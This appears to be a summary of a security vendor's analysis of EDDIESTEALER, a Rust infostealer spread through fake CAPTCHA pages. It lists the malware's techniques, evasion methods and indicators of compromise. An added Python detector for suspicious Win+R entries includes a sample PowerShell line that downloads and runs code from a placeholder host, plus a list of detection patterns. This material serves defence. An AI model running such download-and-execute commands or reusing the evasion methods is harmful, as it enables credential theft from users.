Chasing Eddies: New Rust-based InfoStealer used in CAPTCHA campaigns, Elastic Security Labs

Elastic Security Labs discovered EDDIESTEALER, a novel Rust-based infostealer distributed through fake CAPTCHA campaigns that trick users into running malicious PowerShell scripts. The malware targets Windows hosts to steal sensitive data such as credentials, browser information, and cryptocurrency wallets. #EDDIESTEALER #FakeCAPTCHA #RustMalware

Key points

  • EDDIESTEALER is a newly identified Rust-based infostealer delivered via fake CAPTCHA verification pages that persuade users to execute malicious PowerShell commands.
  • The infostealer communicates with a command and control (C2) server to receive task lists specifying targeted data types, which include credentials, browsers, password managers, FTP clients, messaging apps, and crypto wallets.
  • The malware uses advanced obfuscation techniques, including XOR string encryption, custom WinAPI lookup methods, and stripped Rust function symbols that require specialized analysis tools.
  • EDDIESTEALER performs sandbox detection by checking system physical memory and can self-delete using NTFS alternate data stream renaming to avoid detection and removal.
  • It implements Chromium-specific credential theft by spawning hidden or off-screen browser windows to read process memory and uses Chrome’s remote debugging protocol to extract saved passwords.
  • Recent variants have expanded capabilities including system profiling (processes, GPU, CPU info) and altered C2 communication with hardcoded encryption keys and server-side sandbox evasion.
  • Initial infection vector involves obfuscated React-based JavaScript displaying fake CAPTCHA interfaces that copy PowerShell commands into the clipboard for user execution.

MITRE Techniques

  • [T1059] Command and Scripting Interpreter – Use of PowerShell commands copied to clipboard and executed via Windows run dialog to deploy malware (“…malicious PowerShell script…”).
  • [T1547] Boot or Logon Autostart Execution – Creation of a unique mutex to prevent multiple instances from running, ensuring persistence (“…creating a mutex named by a decrypted UUID string…”).
  • [T1036] Masquerading – Use of fake CAPTCHA pages mimicking legitimate Google reCAPTCHA to lure users (“…mimicking Google’s reCAPTCHA verification interface…”).
  • [T1105] Ingress Tool Transfer – Downloading second-stage payloads (gverify.js and EDDIESTEALER executable) from attacker-controlled domains (“…silently downloads… saves to Downloads folder…”).
  • [T1071] Application Layer Protocol – Use of HTTP for C2 communication sending encrypted data and receiving commands (“…C2 communication characterized by multiple, task-specific POST requests over HTTP…”).
  • [T1204] User Execution – Social engineering to persuade users to run commands from clipboard (“…instructions to press Windows + R, then Ctrl + V to paste malicious command…”).
  • [T1543] Create or Modify System Process – Spawning hidden or off-screen browser processes to extract credentials (“…spawns new browser instance with window off-screen using specific command-line arguments…”).
  • [T1027] Obfuscated Files or Information – Encryption of strings via XOR and obfuscated JavaScript loaders (“…strings encrypted via simple XOR cipher… gverify.js is obfuscated…”).
  • [T1005] Data from Local System – Targeted exfiltration of files including crypto wallets, browsers, password managers, FTP clients, and messaging apps (“…reads targeted files using kernel32.dll functions…”).
  • [T1562] Impair Defenses – Self-deletion using NTFS alternate data streams to evade analysis and removal (“…self-deletes by renaming NTFS alternate data streams…”).
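The paste-and-run lure above (T1059, T1204) leaves a trace defenders can hunt: whatever the victim pastes into the Windows + R dialog is recorded under the RunMRU registry key. The following added example, which is not code from the Elastic report, scores exported RunMRU values for PowerShell one-liners with download-and-execute markers; the sample entries and the host/path in them are constructed for the example.

```python
"""Flag Win+R (RunMRU) entries consistent with the paste-and-run fake CAPTCHA lure.

RunMRU values live under HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU;
each value ends with the literal suffix "\\1". Sample data below is constructed, not real telemetry.
"""
import re

# Tokens typical of clipboard-pasted PowerShell one-liners (download + execute, hidden window).
SUSPICIOUS_TOKENS = [
    r"\biex\b", r"invoke-expression",
    r"\biwr\b", r"invoke-webrequest",
    r"\birm\b", r"invoke-restmethod",
    r"downloadstring",
    r"-w(?:indowstyle)?\s+hidden",
    r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}",
    r"https?://",
]

def score_run_entry(value: str) -> tuple[int, list[str]]:
    """Return (score, matched tokens) for one RunMRU value; 0 if it is not a PowerShell launch."""
    text = value.removesuffix("\\1").strip()
    if not re.search(r"(?:^|[\\/\s'\"])(?:powershell|pwsh)(?:\.exe)?\b", text, re.I):
        return 0, []
    hits = [tok for tok in SUSPICIOUS_TOKENS if re.search(tok, text, re.I)]
    return len(hits), hits

def flag_runmru(entries: dict[str, str], threshold: int = 2) -> list[str]:
    """Return the value names whose score meets the threshold (the MRUList ordering value is skipped)."""
    return [name for name, val in entries.items()
            if name != "MRUList" and score_run_entry(val)[0] >= threshold]

# Constructed sample resembling a RunMRU export; example.invalid is a placeholder host.
SAMPLE_RUNMRU = {
    "MRUList": "cab",
    "a": "notepad\\1",
    "b": 'powershell -w hidden -c "iex (iwr http://example.invalid/x)"\\1',
    "c": "cmd\\1",
}

if __name__ == "__main__":
    for name in flag_runmru(SAMPLE_RUNMRU):
        print(name, score_run_entry(SAMPLE_RUNMRU[name]), SAMPLE_RUNMRU[name])
```

The threshold of two markers keeps a bare "powershell" launch from alerting while still catching the hidden-window download-and-execute shape described in the report.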

Indicators of Compromise

  • [SHA-256 hashes] Multiple EDDIESTEALER sample hashes – e.g., 47409e09afa05fcc9c9eff2c08baca3084d923c8d82159005dbae2029e1959d0, 162a8521f6156070b9a97b488ee902ac0c395714aba970a688d54305cb3e163f, and others mentioned for various loader and executable files.
  • [Domain names] Malware and infrastructure C2 and intermediate domains – llll.fit, plasetplastik.com, militrex.wiki, shiglimugli.xyz, xxxivi.com.
  • [IPv4 addresses] C2 and infrastructure IPs – 45.144.53[.]145, 84.200.154[.]47.
  • [File names] EDDIESTEALER loaders and payloads – verifcheck.exe, g_verify.js, verif.js, AegZs85U6COc.exe, PETt3Wz4DXEL.exe, Tk7n1al5m9Qc.exe, and others with pseudorandom names.

Read more: https://www.elastic.co/security-labs/eddiestealer